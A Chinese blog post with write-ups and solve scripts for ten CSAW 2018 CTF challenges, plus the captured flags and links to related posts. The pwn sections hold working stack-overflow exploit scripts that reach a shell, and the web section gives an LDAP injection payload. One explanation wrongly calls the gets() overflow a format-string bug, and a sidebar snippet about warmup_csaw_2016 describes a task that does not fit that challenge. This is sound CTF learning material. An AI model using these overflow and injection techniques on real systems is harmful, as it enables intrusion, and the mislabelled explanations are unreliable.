2018-CSAW writeups

最新推荐文章于 2024-05-09 08:52:12 发布
最新推荐文章于 2024-05-09 08:52:12 发布
阅读量479 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/82751792
版权

第一次做这样的新题目 做不出几道感觉无从下手 记录一下补题情况

  • 1.Twitch Plays Test Flag

思路:签到
answer:flag{typ3_y3s_to_c0nt1nue}

  • 2.bin_t

思路:AVL树的插入 队友发现可以先去重再插入(用C++,写的多一点)
下面给了python的
调用别人写好的函数
https://github.com/pgrafov/python-avl-tree/blob/master/pyavltree.py
在这里插入图片描述
code:

from pwn import *
from pyavltree import AVLTree

r = remote("misc.chal.csaw.io", 9001) # 连接服务器的命令
r.recvline()  #接受一行废话
numbers = [int(x) for x in r.recvline().split(",")] #将接受到的数组除去逗号后转成list
r.recvline()  # 接受一行废话

tree = AVLTree(numbers)  #调用函数构造树

r.sendline(",".join([str(x) for x in tree.preorder(tree.rootNode)]))
print r.recvall()

answer:flag{HOW_WAS_IT_NAVIGATING_THAT_FOREST?}

  • 3. babycrypto

思路:加密算法: 先解密base64 再异或解密
从 single yeet yeeted with single yeet == 0 x^x=0
code:

from base64 import b64decode
ss = "s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg=="
ciphertext = b64decode(ss)
for i in range(256):
	s = ""
	for j in range(len(ciphertext)):
		s += chr(ord(ciphertext[j])^i)
	if "flag{" in s:
		print i
		print  s

answer:flag{diffie-hellman-g0ph3rzraOY1Jal4cHaFY9SWRyAQ6aH}

  • 4. algreba

思路:服务器返回一个等式 让你求出X 刚开始以为只有加减乘除 后来发现自己还是太年轻
code:

from pwn import *
from re import *
r = remote("misc.chal.csaw.io",9002)
r.recvuntil("***")
print r.recvline()
while True:
	toSolve = r.recvline()
	print toSolve
	print r.recvuntil("What does X equal?: ")
	temp = toSolve.replace("=","-(")+")"
	c=eval(temp,{"X":1j})
	ans = 0
	if c.imag != 0:
		ans = -c.real/c.imag
	r.sendline(str(ans))
	print r.recvline()

answer:flag{y0u_s0_60od_aT_tH3_qU1cK_M4tH5}

  • 5. simple_recovery

思路:windows 下利用findstr 命令查找文本串
先解压
cmd :
findstr "flag" disk.img

another solution
ubuntu 下
$ 7z x disk.img0.7z
$ 7z x disk.img1.7z
$ rg -a -e "flag\{"
7z 解压然后 rg~
rg下载
参考https://github.com/BurntSushi/ripgrep 超快!查找大文件
$ curl -LO https://github.com/BurntSushi/ripgrep/releases/download/0.10.0/ripgrep_0.10.0_amd64.deb
$ sudo dpkg -i ripgrep_0.10.0_amd64.deb
code:
None

answer:flag{dis_week_evry_week_dnt_be_securty_weak}

  • 6. bigboy

思路: 静态分析 拖到ida里看main函数
动态跟踪
gdb -q ./boi
pdisas main
b* 0x00000000004006a8 cmp xx with xx
r
x/40wx $rsp
在这里插入图片描述
在这里插入图片描述

我们发现偏移为20 所以只要把前面20字节用垃圾值填充 后面的用正确的答案填充即可

code:

from pwn import *
r = remote("pwn.chal.csaw.io","9000")
r.recvuntil("***")
print r.recvline()
r.recvline()
addr = "\xee\xba\xf3\xca"
payload = "A"*20+addr
r.sendline(payload)
print r.recvline()
r.interactive()

or 暴力填充6次
python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"'| nc pwn.chal.c saw.io 9000

answer:flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}

  • 7. A Tour of x86 - Part 1

思路: 下载文件 阅读 搜索problem查看所有问题位置 然后

code:
None
xor dh, dh ; <- Question 1 0x00

mov dx, 0xffff ; Hexadecimal
not dx 0x0000
mov gs, dx ; to use them to help me clear <- Question 2 问题让你输出1个字节 so 0x00

mov cx, 0 ; line 107
mov sp, cx ; line 149
mov si, sp ; Source Index <- Question 3 两个字节 0x0000

mov al, 't'
mov ah, 0x0e ; <- question 4 两个字节ax:0x0e74

mov al, [si] ;
mov ah, 0x0e ; <- Question 5! 两个字节 0x0e61 将字符串第一个字节放到了低位
code:
vim 1.txt 写入
0x00
0x00
0x0000
0x0e74
0x0e61
nc rev.chal.csaw.io 9003 < 1.txt
answer:flag{rev_up_y0ur_3ng1nes_reeeeeeeeeeeeecruit5!}

  • 8. Get It?

思路: 下载文件 gdb调试 + IDA静态分析
推荐gdb-peda 这里不赘述
gdb
file get_it加载文件
info functions 显示所有函数
发现有个函数名字为give_shell
disassem give_shell 看一下函数 显然我们通过这个可以拿到shell
因此只要利用格式化字符串漏洞将栈的返回地址覆盖为give_shell的地址 那么我们的任务就完成了
接下来需要判断栈的返回地址在哪
在main的汇编代码中
0x00000000004005e0 <+25>: lea rax,[rbp-0x20]
0x00000000004005e4 <+29>: mov rdi,rax
0x00000000004005e7 <+32>: mov eax,0x0
0x00000000004005ec <+37>: call 0x4004a0 gets@plt
我们发现gets接受了字符串之后写入到rbp-0x20开始的地址中
rbp就是栈的base point(基地址)啦
栈的布局
00000000: 0x4141414141414141 AAAAAAAA // 0 需要8
00000008: 0x4141414141414141 AAAAAAAA // 8 需要8
00000010: 0x4141414141414141 AAAAAAAA // 16 需要8
00000018: 0x4141414141414141 AAAAAAAA // 24 需要8
00000020: 0x4f4c4453544b4652 OLDSTKFR // 32 <- RBP 这里也要填满 需要8
00000028: 0x52455455524e4144 RETURNAD // 40 填成give_shell的地址

因此前面40个垃圾值填充 后面的填成give_shell的地址就好啦

code:

from pwn import *
r = remote("pwn.chal.csaw.io",9001)
print r.recvline()
shell_addr = 0x00000000004005B6
r.sendline('A'*40+p64(shell_addr))
print r.recvline()
r.interactive()

answer:flag{y0u_deF_get_itls}

  • 9. ldab

思路: google + github
网站点进去发现就是一堆列表 搜索题目名字 发现有idab injection 直接搜
相关的payload 一个个尝试
code:
None
*)(uid=*))(|(uid=*
answer:flag{ld4p_inj3ction_i5_a_th1ng}

  • 10. Short Circuit

思路: 普通电学
比赛的时候没做出来 其实很简单的哇 不要一股脑写01再解密 边解密边写!
电线连到主干上的状态写一下即可
在这里插入图片描述
code:
None
answer:flag{owmyhand}

god_speed丶
关注
专栏目录
CSAWCTF-2018-pwn-shellcode 题解
lifanxin的博客
11-29 1432
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节:wp_shellcode.py 知识点关键字 栈溢出,shellcode拆分+组装 样本 样本来自2018CSAWCTF的pwn题目shellcode 运行 检查文件,发现有两个可以利用的点:   栈溢出保护未开启;   NX保护未开启,存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'
攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)
Sea_Sand息禅
04-15 4493
打开网页,日常扫描,发现git泄露: git工具下载相关文件(git工具自行百度): 然而flag.php的内容是这样的没什么用,想着也不会这么简单: 网页源码有这一段: 说明flag应该就在flag.php中,再看看index.php,主要是这一部分: <?php if (isset($_GET['page'])) { $page = $_GET['page']; ...
2018 CSAW
Risker
10-14 853
欢迎关注我的新博客地址:http://mmmmmmlei.cn 之前9月份事情很多没有打CSAW ,听说题质量不错就去做了做,不会的就去复现了一波,跟着师傅们的wp学到了不少东西。 Web Ldab 这道题开始做的时候试了一波注入姿势,没有什么卵用,后来才知道考察的是 LDAP 的注入。 关于 LDAP 及注入的知识点,可以参考这几篇博客: https://www.jianshu.com/p/...
pwn入门第一题-Csaw 2018 Quals Bigboy
fa1c4的blog
01-31 167
题目链接 一道pwn50 查看源码 #include <stdio.h> #include <stdlib.h> #include <unistd.h> void run_cmd(char * cmd){ system(cmd); } int main(int argc, char ** argv){ struct { //order enforcement from josh offsec char buf[17];
2018-09-18-csaw2018_pwn_wp.md
ZNYCSO的博客
09-25 457
layout: post title: “csaw2018_pwn_wp” date: 2018-09-18 categories: jekyll update csaw2018_pwn_wp pwn get_it 非常简单的直接栈溢出控制返回地址到system函数直接getshell from pwn import * context.log_level = &quot;debug&quot; local = ...
XCTF-csaw2013reversing2
臭nana的博客
12-22 1360
三种做法 1、ida静态分析修改指令 main函数反编译的代码 由于运行之后的是乱码,所以可以猜测生成flag的函数没有执行,所以需要跳到生成flag的函数执行,但是前面的中断函数不能执行,需要nop掉,并且后面退出程序的函数不能执行,需要跳到弹框函数继续执行。(修改的路径和文件名不要有中文,我用ida修改的时候踩了坑,大家可以试一试) ida修改代码的方法: 1、鼠标停留在要修改的...
2015-CSAW-contacts [fmtstr in heap]
ACdream
03-05 1032
先尝试着找到漏洞点:fmtstr 在新建联系人时,如果在Description项中输入格式化字符串,在存在相应漏洞点 然后对应到:先Create,再Display,并定位到相关函数 程序开启了NX和Canary,来单步调试一下看看在漏洞点处发生了什么 Breakpoint 1, 0x08048c22 in ?? () gdb-peda$ stack 20 0000| 0xff...
Linux kernel pwn --- CSAW2015 StringIPC
abelxu
03-21 337
0x01查看题目 1.launch.sh。 qemu-system-x86_64 \ -m 512 \ -kernel ./bzImage \ -initrd ./rootfs.cpio \ -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \ -nographic \ -s \ -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
攻防世界-csaw2013reversing2
最新发布
2301_77301535的博客
05-09 230
到了这里发现存在两个MessageBox但是目标走的是乱码的那个MessageBox所以这里将它的跳转条件修改以哦那位int3下面存在一个赋值,但是不知道给了什么内容所以将je改成jmp到mov edx 那里然后继续往下走。这题打开就是一堆乱码,这里的思路是猜测可能存在两个MessageBox并且真正输出flag的那个MessageBox并没有走进判断里面,ok有了思路直接上实操。到了这里发现jmp直接跳到结束去了,这里让它跳到messagebox的入栈出,最后得到最终flag。
攻防世界--csaw2013reversing2
weixin_30607659的博客
08-30 244
测试文件:https://adworld.xctf.org.cn/media/task/attachments/3f35642056324371b913687e770e97e6.exe 1.准备 打开测试文件,flag内容为乱码。 检测文件信息 获得信息 32位文件 OllyDbg打开 2.IDA打开 将main函数反编译为C语言文件后,...
【XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
【攻防世界】REVERSE新手练习区 - csaw2013reversing2
m0_60377292的博客
08-08 224
csaw2013reversing2 - wp
from Crypto.Cipher import AES 报错 ImportError: No module named Crypto.Cipher
CODER的博客
03-04 6148
环境:py2.7 方法:顺序执行 pip uninstall Crypto pip uninstall pycrypto pip install pycrypto 第三步如果出错 下载一个这个 https://www.microsoft.com/en-us/download/details.aspx?id=44266...
2DES
CODER的博客
08-06 4293
什么是2DES: 就是对明文用不同密钥加密了两次(真正的3DES是用不同的密钥加密再解密再加密)。 为什么不安全: 2DES不安全在于可以中间相遇攻击大幅度减小求密钥的运算量:假设已经获得了明文和密文,对密钥空间2^56的所有可能求明文的加密结果并存储至数组,再对密钥空间所有可能求密文的解密结果看看在不在数组里面,如果在就称为中间相遇,这种攻击方法复杂度只略大于2^57,显著低于加密两次用到...
base64二次加密+异或
CODER的博客
09-24 3903
给定加密后的密文 给定keylength的范围 给定key中每个数的大小 求出原文? 本以为两次加密强度应该更高 没想到 也是一样的容易被破解啊 其原因在于第一次的base64加密得到的字符集是确定的 即’a’-‘z’ ‘A’-‘Z’ 0-9 +/= so 可以根据这个暴力得出key的可能解 答案就显然了 代码中的注释是我一步步得到结果之后方便自己看而注释掉的 import base64 ciph...
CTF_WEB题心得
CODER的博客
07-30 2813
1.看源码 注释 firefox找cookie 看响应 2.web题大多结合加密与解密 3.curl命令 最近遇到一道题 302跳转 本以为是基础的重定向 在网站域名上很细节1变成l curl -L http://xxx 跟随302跳转 curl http://xxx 默认不跟随302跳转 4.抓包修改 firefox极力推荐!!! burp每次要改代理很烦 5.其他就是一些php...
rbash
CODER的博客
04-19 2696
1.r意味着restrict 2.使用BASH_CMDS[a]=/bin/sh;a 3. $ export PATH=$PATH:/bin/ $ export PATH=$PATH:/usr/bin 4. echo /*查看文件 5. 自己使用命令吧 https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html...
2018鹏程杯 初赛 Writeup
CODER的博客
12-14 2233
1.签到 公众号回复 2.Traffic Light misc stegsolve打开看可以发现1000多帧 网上找了个脚本分离所有帧(python3+PIL) 根据红黄绿信号猜测0 1 空格 可以图像识别 但细心点可以发现文件大小并不相同 于是根据图像大小得到一串数字 相应的图片做一个映射即可 3.Quotes misc 脑洞题 My+mission+in+life+is+not+mer ely...
warmup_csaw_2016 1
03-16
这是一道CSAW 2016年的预热题目,需要我们在给定的字符串中找到所有的数字,并将它们相加起来。 具体的做法是,我们可以遍历字符串中的每一个字符,判断它是否是数字,如果是数字就将它转换成整数并加到总和中。最后输出总和即可。 以下是Python代码实现: ```python s = "Th15_15_4_l0ng3r_fl46_th4n_1t_n33ds_t0_b3" total = 0 for c in s: if c.isdigit(): total += int(c) print(total) ``` 输出结果为:`45`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值